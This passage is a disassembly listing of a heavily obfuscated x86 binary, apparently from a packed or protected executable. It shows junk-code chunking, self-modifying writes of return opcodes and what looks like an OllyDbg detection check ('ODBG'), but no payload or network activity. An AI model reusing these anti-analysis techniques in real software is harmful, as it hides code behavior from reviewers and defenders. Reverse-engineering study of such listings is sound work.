; FUNCTION CHUNK AT 00445638 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004470A4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004475E7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044906F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00449227 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449251 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044985B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CF9A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F2C7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F822 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044FCD3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450C47 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00451799 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004525EB SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00452C53 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045836F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459101 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		cmp	al, 0A4h
		jz	loc_450C47
		jmp	loc_44F822
sub_43E60A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	edx, 0F2B89A19h
		push	ecx
		push	offset sub_451BC8
		jmp	loc_4525DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB53

loc_43E62B:				; CODE XREF: sub_44DB53:loc_444084j
		jnz	loc_452A2D
		jmp	loc_456F0D
; END OF FUNCTION CHUNK	FOR sub_44DB53
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44107D

loc_43E636:				; CODE XREF: sub_44107D:loc_455CA6j
		and	ecx, 0B67580ECh
		add	ecx, 6DF061BFh
		xchg	ecx, [esp+4+var_4]
		jmp	loc_43A4F0
; END OF FUNCTION CHUNK	FOR sub_44107D
; ---------------------------------------------------------------------------

loc_43E64A:				; CODE XREF: hvvrg7ie:loc_45759Dj
		call	sub_450C5A
		push	ecx
		push	0CCEC6979h
		pop	ecx
		add	ecx, 6D568945h
		xor	ecx, 0C1F4A217h
		and	ecx, 5721F3E6h
		jmp	loc_447B8C
; ---------------------------------------------------------------------------

loc_43E66D:				; CODE XREF: hvvrg7ie:00443FAEj
		push	7F8DB645h
		jmp	loc_4481A7
; ---------------------------------------------------------------------------

loc_43E677:				; CODE XREF: hvvrg7ie:0045017Fj
		cmp	ebp, 157699B7h
		jmp	loc_455FFB
; ---------------------------------------------------------------------------

loc_43E682:				; CODE XREF: hvvrg7ie:00459848j
		mov	esi, 985643D1h

loc_43E687:				; CODE XREF: hvvrg7ie:004482B4j
		xor	edx, 0BA4C4D24h
		add	edx, 2FE561C6h
		push	edx
		pushf
		push	0F7ADCA6Bh
		jmp	loc_43B19F
; ---------------------------------------------------------------------------
		jnz	loc_455B95
		jmp	loc_455B0D
; ---------------------------------------------------------------------------

loc_43E6AA:				; CODE XREF: hvvrg7ie:00439B53j
		push	edx
		call	sub_43C811
		mov	eax, 64A3F24h
		call	sub_458A13
		mov	ds:off_41D1F8, eax
		lea	eax, loc_44D806
		jmp	loc_43ECA5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_506. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AAE4

loc_43E6CC:				; CODE XREF: sub_43AAE4+20994j
		jmp	loc_4522A3
; END OF FUNCTION CHUNK	FOR sub_43AAE4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44934B

loc_43E6D1:				; CODE XREF: sub_44934B+5F69j
		jmp	loc_44993D
; END OF FUNCTION CHUNK	FOR sub_44934B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450A7A

loc_43E6D6:				; CODE XREF: sub_450A7A-C3CCj
		jmp	loc_43DEB5
; END OF FUNCTION CHUNK	FOR sub_450A7A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456423

loc_43E6DB:				; CODE XREF: sub_456423-19412j
		jmp	loc_439FB7
; END OF FUNCTION CHUNK	FOR sub_456423
; ---------------------------------------------------------------------------

loc_43E6E0:				; CODE XREF: hvvrg7ie:0043BC40j
		jmp	loc_43F79D
; ---------------------------------------------------------------------------

loc_43E6E5:				; CODE XREF: hvvrg7ie:004398EEj
		jmp	locret_442AFC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_43E6EA:				; CODE XREF: sub_440C05:loc_44CAE9j
		call	sub_4523D3

loc_43E6EF:				; CODE XREF: sub_44646D:loc_43FF32j
		cdq
		test	ebx, 8288D0DFh
		jmp	loc_44DE20
; END OF FUNCTION CHUNK	FOR sub_440C05
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_43E6FB:				; CODE XREF: sub_444BE1-AEF5j
		xor	ecx, 0FA379545h
		or	ecx, 1116F9DFh
		and	ecx, 8BF0A6A2h
		call	sub_43AA2D
; END OF FUNCTION CHUNK	FOR sub_444BE1
; START	OF FUNCTION CHUNK FOR sub_458F33

loc_43E712:				; CODE XREF: sub_458F33-7B67j
		jmp	loc_449DEA
; END OF FUNCTION CHUNK	FOR sub_458F33
; ---------------------------------------------------------------------------

loc_43E717:				; CODE XREF: hvvrg7ie:0044247Dj
		jmp	loc_43B7EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E72F

loc_43E71C:				; CODE XREF: sub_44E72F-13ECAj
		inc	dword ptr [ebp-20h]
		mov	eax, [ebp-1Ch]
		mov	eax, ds:dword_44EE40[eax*4]
		mov	[ebp-8], eax
		cmp	dword ptr [ebp-8], 0
		jnz	loc_458A95

loc_43E736:				; CODE XREF: hvvrg7ie:0044F3F0j
					; sub_440631+1845Ej
		jnb	loc_4478A4
		jmp	loc_43DAA3
; END OF FUNCTION CHUNK	FOR sub_44E72F

; =============== S U B	R O U T	I N E =======================================



sub_43E741	proc near		; DATA XREF: sub_43A3D5+5C0Co

; FUNCTION CHUNK AT 00441A03 SIZE 00000005 BYTES

		add	eax, 0BA9391BDh
		mov	eax, [eax]
		push	eax
		push	offset sub_45919F
		jmp	loc_441A03
sub_43E741	endp

; ---------------------------------------------------------------------------
		mov	esi, eax
		jmp	loc_4595E1

; =============== S U B	R O U T	I N E =======================================



sub_43E75B	proc near		; CODE XREF: sub_4447AC-1DE8p
					; hvvrg7ie:0044D25Bj

; FUNCTION CHUNK AT 00441D37 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00442841 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458D70 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		call	sub_450C5A
		push	esi
		push	431DAE90h
		pop	esi
		sub	esi, 5F558F0Eh
		add	esi, 0F11C01DDh
		jmp	loc_458D70
sub_43E75B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_43E77C	proc near		; CODE XREF: sub_45861Bj
					; DATA XREF: sub_45A91B-230Ao

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00458024 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00459DDD SIZE 00000005 BYTES

		call	sub_44CB64
		mov	eax, 11C9A2C5h
		push	edi
		push	903104CCh
		jmp	loc_459DDD
sub_43E77C	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_47. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450810

loc_43E792:				; CODE XREF: sub_450810+AE31j
		jmp	nullsub_469
; END OF FUNCTION CHUNK	FOR sub_450810
; ---------------------------------------------------------------------------
		mov	ds:off_41D0B0, eax
		lea	eax, loc_44EA5C
		mov	byte ptr [eax],	0C3h
		jmp	loc_453FC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C2EA

loc_43E7AB:				; CODE XREF: sub_44C2EA:loc_44EA5Cj
		pop	edx
		mov	eax, [esp-4+arg_0]
		jmp	loc_45810F
; END OF FUNCTION CHUNK	FOR sub_44C2EA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458706

loc_43E7B4:				; CODE XREF: sub_458706-13FE8j
		call	sub_444C9C

loc_43E7B9:				; CODE XREF: hvvrg7ie:00459954j
		jmp	loc_452A84
; END OF FUNCTION CHUNK	FOR sub_458706
; ---------------------------------------------------------------------------

loc_43E7BE:				; CODE XREF: hvvrg7ie:00448403j
		jbe	loc_457D2A
		cmp	eax, 0DEB8EE21h
		jmp	loc_441C24
; ---------------------------------------------------------------------------

loc_43E7CF:				; CODE XREF: hvvrg7ie:00452DE8j
		jge	loc_44A196
		cdq
		jmp	sub_45771A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43931C

loc_43E7DB:				; CODE XREF: sub_43931C:loc_4404BAj
		pop	ebp
		mov	eax, ds:dword_43CDC0
		or	eax, eax
		jnz	loc_43DE79
		jmp	loc_44F984
; END OF FUNCTION CHUNK	FOR sub_43931C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446A16

loc_43E7EF:				; CODE XREF: hvvrg7ie:loc_43DE56j
					; sub_446A16-5B22j
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_446A16

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_43E7F3	proc near		; CODE XREF: sub_441B65:loc_439A45p
					; hvvrg7ie:loc_439E52p	...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043E184 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00445878 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00453870 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045969D SIZE 0000000C BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFF8h
		mov	[ebp+var_4], eax
		call	nullsub_22
		jmp	loc_453870
sub_43E7F3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dw 8A0Fh
		dd 3B75h, 90E9388Bh
		db 95h,	2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_43E813	proc near		; CODE XREF: sub_448BC0+91DFp

; FUNCTION CHUNK AT 0043EE53 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004495D1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045702D SIZE 0000000F BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	ecx
		add	ecx, 0C068D573h
		jmp	loc_4495D1
sub_43E813	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_43E823:				; CODE XREF: sub_450AA8:loc_44AF7Ej
					; hvvrg7ie:004560FCj
		jz	loc_45B73A
		jmp	loc_442DD4
; END OF FUNCTION CHUNK	FOR sub_450AA8

; =============== S U B	R O U T	I N E =======================================



sub_43E82E	proc near		; DATA XREF: hvvrg7ie:loc_44C9F5o
		add	edx, 27A341CDh
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_44520A
		jmp	loc_447F66
sub_43E82E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_43E845:				; CODE XREF: sub_43F227+17777j
		pop	edx
		rol	eax, 1Eh
		or	edx, ecx
		pop	ebx
		shl	edx, 12h
		jmp	loc_449DD4
; END OF FUNCTION CHUNK	FOR sub_43F227

; =============== S U B	R O U T	I N E =======================================



sub_43E854	proc near		; CODE XREF: sub_451176:loc_43FB7Fp
					; sub_43B8A5+1923Cp

; FUNCTION CHUNK AT 0045A30B SIZE 00000005 BYTES

		push	offset sub_441D9D
		jmp	loc_45A30B
sub_43E854	endp

; ---------------------------------------------------------------------------
		push	eax

loc_43E85F:				; CODE XREF: hvvrg7ie:loc_43A9BFj
		ror	eax, 0Bh
; START	OF FUNCTION CHUNK FOR sub_439873

loc_43E862:				; CODE XREF: sub_439873+709Cj
		push	esi
		push	0AA5B7DEBh
		pop	esi
		add	esi, 98933610h
		jmp	loc_443631
; END OF FUNCTION CHUNK	FOR sub_439873
; ---------------------------------------------------------------------------
		mov	eax, 0F38AA262h
		call	sub_450C5A
		mov	ds:off_41D150, eax
		lea	eax, sub_443048
		mov	byte ptr [eax],	0C3h
		jmp	sub_443048
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F8F2

loc_43E892:				; CODE XREF: sub_44F8F2+5204j
		jns	loc_44B68E
		xor	edx, 0A434A4FBh
		jmp	loc_44D943
; END OF FUNCTION CHUNK	FOR sub_44F8F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_43E8A3:				; CODE XREF: sub_44191F+A4FCj
		jb	loc_43F7CD
; END OF FUNCTION CHUNK	FOR sub_44191F
; START	OF FUNCTION CHUNK FOR sub_43D30A

loc_43E8A9:				; CODE XREF: sub_43D30A:loc_440090j
		mov	eax, 0BB0E1C2h
		call	sub_450C5A
		xor	eax, 4E86B5CAh
		push	ecx
		jmp	loc_44B53E
; END OF FUNCTION CHUNK	FOR sub_43D30A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_43E8BF:				; CODE XREF: sub_44D2F8:loc_44EB84j
		cmp	dword ptr [eax], 4742444Fh
		jz	loc_43BCB4
		jmp	loc_43FE51
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EA21

loc_43E8D0:				; CODE XREF: sub_43EA21:loc_448E38j
		push	offset loc_45B43D
		jmp	loc_45852B
; END OF FUNCTION CHUNK	FOR sub_43EA21
; ---------------------------------------------------------------------------

loc_43E8DA:				; CODE XREF: hvvrg7ie:00442B2Cj
		js	loc_45A720
		adc	ecx, 5B2815E9h
		and	eax, ecx
		add	ecx, eax
		cmp	eax, 0CD53BECh
		jmp	loc_440A1F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449466

loc_43E8F5:				; CODE XREF: sub_449466:loc_4422C0j
		xor	edx, 93C40CA7h
		add	edx, 0EE1DF99h
		mov	[edx], eax
		pop	edx
		lea	eax, sub_446B4C
		jmp	loc_43D51E
; END OF FUNCTION CHUNK	FOR sub_449466
; ---------------------------------------------------------------------------

loc_43E90F:				; CODE XREF: hvvrg7ie:loc_451D02j
		rol	ecx, 1Bh
		jb	loc_458FB5
; START	OF FUNCTION CHUNK FOR sub_455087

loc_43E918:				; CODE XREF: sub_455087+2F98j
		jmp	loc_45591F
; END OF FUNCTION CHUNK	FOR sub_455087
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446B4C

loc_43E91D:				; CODE XREF: sub_446B4C-5FBBj
		jmp	nullsub_21
; END OF FUNCTION CHUNK	FOR sub_446B4C
; ---------------------------------------------------------------------------
		xor	eax, 13A2F4DDh
		pushf
		jmp	loc_458FB3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455273

loc_43E92E:				; CODE XREF: sub_455273:loc_455098j
		push	offset loc_45A1E9
		jmp	loc_44D34C
; END OF FUNCTION CHUNK	FOR sub_455273

; =============== S U B	R O U T	I N E =======================================



sub_43E938	proc near		; DATA XREF: sub_43D946+Co
		push	37D78C6Ah
		pop	eax
		rol	eax, 15h
		and	eax, 0E6EBAA50h
		sub	eax, 0BEC4CD9h
		xor	eax, 55100030h
		add	eax, ebp
		jmp	loc_449E63
sub_43E938	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C562

loc_43E95A:				; CODE XREF: sub_43C562+15j
		and	ecx, 85437ADEh
		add	ecx, 38F545ABh
		or	ecx, 51313984h
		add	ecx, 50C10D7h
		mov	[ecx], eax
		jmp	loc_43EC3E
; END OF FUNCTION CHUNK	FOR sub_43C562
; ---------------------------------------------------------------------------

loc_43E979:				; DATA XREF: sub_446356-7226o
		xchg	edx, [esp]
		mov	ebp, edx
		pop	edx

loc_43E97F:				; CODE XREF: hvvrg7ie:00456001j
		push	0EDFAE1DBh
		jmp	loc_45908C
; ---------------------------------------------------------------------------

loc_43E989:				; CODE XREF: hvvrg7ie:00451D85j
		jbe	loc_443E1D

; =============== S U B	R O U T	I N E =======================================



sub_43E98F	proc near		; CODE XREF: sub_4421DE:loc_44DBD7p

; FUNCTION CHUNK AT 0043DDAD SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	eax, [ebp+8]
		jmp	loc_43DDAD
sub_43E98F	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_345. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_43E99C:				; CODE XREF: hvvrg7ie:00449A0Aj
		jmp	nullsub_5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403B6

loc_43E9A1:				; CODE XREF: sub_4403B6-2162j
		jmp	loc_458A9F
; END OF FUNCTION CHUNK	FOR sub_4403B6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_43E9A6:				; CODE XREF: sub_44BCAE+9795j
		sub	edx, 0B0CF62Ah
		add	edx, 0E9240F2Eh
		add	eax, edx
		pop	edx
		xor	eax, 3CE7CA29h
		push	offset loc_4477D9
		jmp	loc_4419EC
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_43E9C5:				; CODE XREF: sub_43EB47:loc_44BF79j
		jns	loc_4588D9
		xchg	ebp, [ebx]
		mov	ecx, [edi]
		jmp	loc_441BFA
; END OF FUNCTION CHUNK	FOR sub_43EB47
; ---------------------------------------------------------------------------

loc_43E9D4:				; CODE XREF: hvvrg7ie:00442CF1j
		add	esi, ecx

; =============== S U B	R O U T	I N E =======================================



sub_43E9D6	proc near		; CODE XREF: sub_4450A8p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044464B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00446266 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A6FB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00453FBB SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	ebp
		jmp	loc_453FBB
sub_43E9D6	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FA83

loc_43E9E0:				; CODE XREF: sub_43FA83:loc_440489j
		xor	eax, 54016AE8h
		and	eax, 4EE7071Dh
		add	eax, 41A5FE24h
		add	eax, ebp
		add	eax, 7416FFCFh
		jmp	loc_457C70
; END OF FUNCTION CHUNK	FOR sub_43FA83
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_123. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450590

loc_43EA00:				; CODE XREF: sub_450590-3749j
		jmp	loc_45A85A
; END OF FUNCTION CHUNK	FOR sub_450590
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_43EA05:				; CODE XREF: sub_43C811+2D6Aj
		jmp	loc_44B06B
; END OF FUNCTION CHUNK	FOR sub_43C811
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44955C

loc_43EA0A:				; CODE XREF: sub_44955C:loc_451760j
		pop	eax
		rol	eax, 1Dh
		xor	eax, 0E7DF23DBh
		add	eax, ebp
		add	eax, 7B622538h
		jmp	loc_44D29C
; END OF FUNCTION CHUNK	FOR sub_44955C

; =============== S U B	R O U T	I N E =======================================



sub_43EA21	proc near		; CODE XREF: hvvrg7ie:0043BE26p
					; sub_44E23D+24Dj

; FUNCTION CHUNK AT 0043D4B7 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043E8D0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00448E38 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045852B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004588AC SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		shl	al, cl
		mov	edx, [ebp-14h]
		jmp	loc_4588AC
sub_43EA21	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A0EC

loc_43EA2F:				; CODE XREF: sub_43A0EC:loc_4432CEj
		movzx	eax, word ptr [eax+14h]
		push	esi
		push	0DC65ED0h
		pop	esi
; END OF FUNCTION CHUNK	FOR sub_43A0EC
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_43EA3A:				; CODE XREF: sub_44191F+1508Fj
		sub	esi, 8FDFA033h
		jmp	loc_44EB8E
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449232

loc_43EA45:				; CODE XREF: sub_449232:loc_4589C3j
		mov	ebp, 0CFF5A61Eh
		jmp	loc_453BA0
; END OF FUNCTION CHUNK	FOR sub_449232
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_43EA4F:				; CODE XREF: sub_450434-12087j
		ja	loc_448EE6
		or	edi, ebp
		jmp	loc_44427F
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
		js	sub_444219
		shl	ebp, 4
		jmp	loc_44BAC7
; ---------------------------------------------------------------------------
		sub	ebp, edx
		jmp	loc_457263
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_43EA71:				; CODE XREF: sub_43F227+9B86j
		jbe	loc_442A24
		ror	eax, 1Ch
		ja	loc_43D2AE
		jmp	loc_4525B7
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------

loc_43EA85:				; CODE XREF: hvvrg7ie:004409DCj
		shl	ecx, 11h
		cmp	ecx, esi
		jmp	loc_439D3B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45278C

loc_43EA8F:				; CODE XREF: sub_45278C+121j
		jnb	loc_43D0BA

loc_43EA95:				; CODE XREF: sub_45278C:loc_45289Ej
		sub	ebx, 70BF342h
		add	ebx, 0EDFACC81h
		xchg	ebx, [esp+4+var_4]
		jmp	sub_43A87E
; END OF FUNCTION CHUNK	FOR sub_45278C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AA38

loc_43EAA9:				; CODE XREF: sub_45AA38+Fj
		pop	esi
		xor	esi, 513887C9h
		sub	esi, 537EC487h
		cmp	esi, 58FC796Ah
		jmp	loc_440298
; END OF FUNCTION CHUNK	FOR sub_45AA38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_43EAC1:				; CODE XREF: sub_456A52-D910j
		jle	loc_452318

loc_43EAC7:				; CODE XREF: sub_456A52:loc_4570F8j
		push	edi
		push	offset sub_44958B
		jmp	nullsub_264
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F9F

loc_43EAD2:				; CODE XREF: sub_456F9F:loc_445BCBj
		call	sub_456FE7

loc_43EAD7:				; CODE XREF: sub_43D2D8+1B29Ej
		jmp	loc_4509E8
; END OF FUNCTION CHUNK	FOR sub_456F9F
; ---------------------------------------------------------------------------

loc_43EADC:				; CODE XREF: hvvrg7ie:00452F67j
		xor	edx, 0ECE106E9h
		add	edx, ebp
		add	edx, 5797B853h
		mov	[edx], eax
		jmp	loc_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454D23

loc_43EAF1:				; CODE XREF: sub_454D23+Fj
		xor	al, al
		or	eax, eax
		jnz	loc_439973
		jmp	loc_459879
; END OF FUNCTION CHUNK	FOR sub_454D23
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF3E

loc_43EB00:				; CODE XREF: sub_43EF3E+AAj
		jz	loc_43ED45
		jmp	loc_444310
; END OF FUNCTION CHUNK	FOR sub_43EF3E
; ---------------------------------------------------------------------------

loc_43EB0B:				; CODE XREF: hvvrg7ie:00443848j
		jb	loc_456FAD
		and	ecx, 80FB9C4Fh
		shr	eax, 0Dh
		push	ebp

loc_43EB1B:				; CODE XREF: hvvrg7ie:loc_440845j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jmp	loc_4531DB
; ---------------------------------------------------------------------------
		add	eax, 5743BF23h
		jmp	sub_448828
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F9F

loc_43EB31:				; CODE XREF: sub_456F9F+349Ej
		xchg	ebx, [esi]
		adc	eax, edi
		popf
		cdq
		not	ebx
		jmp	loc_452C8C
; END OF FUNCTION CHUNK	FOR sub_456F9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_43EB3E:				; CODE XREF: hvvrg7ie:loc_43AAF0j
					; sub_444BE1:loc_440CC1j
		jle	loc_456D4A
		shl	esi, 0Eh
; END OF FUNCTION CHUNK	FOR sub_444BE1

; =============== S U B	R O U T	I N E =======================================



sub_43EB47	proc near		; CODE XREF: sub_44398A:loc_448B81j
					; sub_45B6DB+22Ap

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043950F SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0043B5B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C470 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043DBB3 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 0043E9C5 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043EC0A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F67C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004400CF SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044035A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441BFA SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004448C4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004460EE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446DCC SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00447D03 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AA33 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044B401 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BF79 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E9A7 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00451DFA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004520D4 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00452A58 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00454804 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458546 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004588D9 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00458CA3 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	eax, [ebp+8]
		push	eax
		jmp	loc_44035A
sub_43EB47	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44059F

loc_43EB54:				; CODE XREF: sub_44059F+17D9Aj
		or	eax, eax
		jnz	loc_44AA03
		jmp	loc_4465D0
; END OF FUNCTION CHUNK	FOR sub_44059F
; ---------------------------------------------------------------------------
		and	edi, 9845736Ch
		jmp	sub_44E68D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D47A

loc_43EB6C:				; CODE XREF: sub_44D47A-11C64j
		jl	loc_453119
		jmp	loc_43A6A8
; END OF FUNCTION CHUNK	FOR sub_44D47A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544DD

loc_43EB77:				; CODE XREF: sub_4544DD-13476j
		ja	loc_4590D5
		xchg	ebp, edx
		test	ecx, edi
		jmp	loc_44E597
; END OF FUNCTION CHUNK	FOR sub_4544DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44457D

loc_43EB86:				; CODE XREF: sub_44457D+3E7Fj
		pop	ecx
		pop	edx
		pop	eax
		pop	ebp
		jmp	loc_456838
; END OF FUNCTION CHUNK	FOR sub_44457D
; ---------------------------------------------------------------------------
		push	ebp
		jmp	loc_4444C2
; ---------------------------------------------------------------------------

loc_43EB95:				; DATA XREF: hvvrg7ie:00449DB8o
		push	260F05B2h
		pop	ebx
		and	ebx, 0B26F9D1Ch
		xor	ebx, 0F91D51FEh
		jmp	loc_44AAB6
; ---------------------------------------------------------------------------
		push	offset sub_449AD1
		jmp	loc_44D4C7

; =============== S U B	R O U T	I N E =======================================



sub_43EBB6	proc near		; CODE XREF: hvvrg7ie:0043BCA7j
					; sub_43EBB6+163AEp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043A8B7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043AC5C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043AD18 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004435DD SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00444A92 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00446B8A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00447457 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044B0ED SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044B18F SIZE 00000011 BYTES
